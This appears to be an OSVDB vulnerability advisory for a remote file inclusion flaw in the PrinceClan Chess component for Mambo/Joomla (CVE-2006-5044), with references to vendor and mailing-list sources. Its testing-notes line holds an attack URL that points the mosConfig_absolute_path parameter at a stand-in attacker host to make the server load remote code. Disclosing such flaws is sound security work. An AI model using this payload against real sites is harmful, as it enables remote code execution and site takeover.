PrinceClan Chess for Mambo/Joomla include.pcchess.php mosConfig_absolute_path Variable Remote File Inclusion

2006-07-24T00:03:30
ID OSVDB:28083
Type osvdb
Reporter OSVDB
Modified 2006-07-24T00:03:30

Description

Manual Testing Notes

http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://evil.txt?

References:

Vendor URL: http://www.princeclan.org/ Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0524.html CVE-2006-5044